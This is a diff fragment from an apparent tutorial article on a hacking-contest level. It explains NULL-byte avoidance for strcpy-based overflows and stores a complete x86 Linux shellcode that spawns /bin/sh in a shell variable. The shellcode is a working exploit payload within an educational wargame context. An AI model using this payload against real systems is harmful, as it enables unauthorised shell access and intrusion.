janosgyerik/articles/hacking-contest-lessons/level4.md

 there is more work to do,
 such as rewriting assembly instructions that use `NULL` values, as `strcpy` won't copy anything beyond the first `NULL`.
 For our purposes,
-we can take the finished shellcode from the Smash The Stack article[5], and for convenience, let's save it in a shell variable:
+we can take the finished shellcode from the article, and for convenience, let's save it in a shell variable:
 ```
 EGG=$(printf '\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh')